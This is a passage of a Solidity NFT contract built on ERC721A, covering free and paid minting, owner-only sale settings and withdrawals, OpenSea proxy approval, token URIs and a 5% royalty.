isCorrectPayment(PUBLIC_SALE_PRICE, numberOfTokens)
|
|
publicSaleActive
|
|
canMintNFTs(numberOfTokens)
|
|
maxMintsPerTX(numberOfTokens)
|
|
{
|
|
|
|
_safeMint(msg.sender, numberOfTokens);
|
|
}
|
|
|
|
|
|
|
|
|
|
function freeMint()
|
|
external
|
|
nonReentrant
|
|
publicSaleActive
|
|
canMintNFTs(1)
|
|
maxMintsPerTX(1)
|
|
freeMintsAvailable()
|
|
{
|
|
_safeMint(msg.sender, 1);
|
|
}
|
|
|
|
|
|
|
|
|
|
|
|
|
|
function getBaseURI() external view returns (string memory) {
|
|
return baseURI;
|
|
}
|
|
|
|
|
|
|
|
function setBaseURI(string memory _baseURI) external onlyOwner {
|
|
baseURI = _baseURI;
|
|
}
|
|
|
|
|
|
|
|
function setIsOpenSeaProxyActive(bool _isOpenSeaProxyActive)
|
|
external
|
|
onlyOwner
|
|
{
|
|
isOpenSeaProxyActive = _isOpenSeaProxyActive;
|
|
}
|
|
|
|
function setIsPublicSaleActive(bool _isPublicSaleActive)
|
|
external
|
|
onlyOwner
|
|
{
|
|
isPublicSaleActive = _isPublicSaleActive;
|
|
}
|
|
|
|
function setNumFreeMints(uint256 _numfreemints)
|
|
external
|
|
onlyOwner
|
|
{
|
|
NUM_FREE_MINTS = _numfreemints;
|
|
}
|
|
|
|
|
|
function withdraw() public onlyOwner {
|
|
uint256 balance = address(this).balance;
|
|
payable(msg.sender).transfer(balance);
|
|
}
|
|
|
|
function withdrawTokens(IERC20 token) public onlyOwner {
|
|
uint256 balance = token.balanceOf(address(this));
|
|
token.transfer(msg.sender, balance);
|
|
}
|
|
|
|
|
|
|
|
|
|
|
|
function nextTokenId() private returns (uint256) {
|
|
tokenCounter.increment();
|
|
return tokenCounter.current();
|
|
}
|
|
|
|
|
|
|
|
function supportsInterface(bytes4 interfaceId)
|
|
public
|
|
view
|
|
virtual
|
|
override(ERC721A, IERC165)
|
|
returns (bool)
|
|
{
|
|
return
|
|
interfaceId == type(IERC2981).interfaceId ||
|
|
super.supportsInterface(interfaceId);
|
|
}
|
|
|
|
|
|
|
|
|
|
function isApprovedForAll(address owner, address operator)
|
|
public
|
|
view
|
|
override
|
|
returns (bool)
|
|
{
|
|
|
|
|
|
ProxyRegistry proxyRegistry = ProxyRegistry(
|
|
openSeaProxyRegistryAddress
|
|
);
|
|
if (
|
|
isOpenSeaProxyActive &&
|
|
address(proxyRegistry.proxies(owner)) == operator
|
|
) {
|
|
return true;
|
|
}
|
|
|
|
return super.isApprovedForAll(owner, operator);
|
|
}
|
|
|
|
|
|
|
|
|
|
function tokenURI(uint256 tokenId)
|
|
public
|
|
view
|
|
virtual
|
|
override
|
|
returns (string memory)
|
|
{
|
|
require(_exists(tokenId), "Nonexistent token");
|
|
|
|
return
|
|
string(abi.encodePacked(baseURI, "/", (tokenId+1).toString(), ".json"));
|
|
}
|
|
|
|
|
|
|
|
|
|
function royaltyInfo(uint256 tokenId, uint256 salePrice)
|
|
external
|
|
view
|
|
override
|
|
returns (address receiver, uint256 royaltyAmount)
|
|
{
|
|
require(_exists(tokenId), "Nonexistent token");
|
|
|
|
return (address(this), SafeMath.div(SafeMath.mul(salePrice, 5), 100));
|
|
}
|
|
}
|
|
|
|
|
|
|
|
contract OwnableDelegateProxy {
|
|
|
|
}
|
|
|
|
contract ProxyRegistry {
|
|
mapping(address => OwnableDelegateProxy) public proxies;
|
|
} |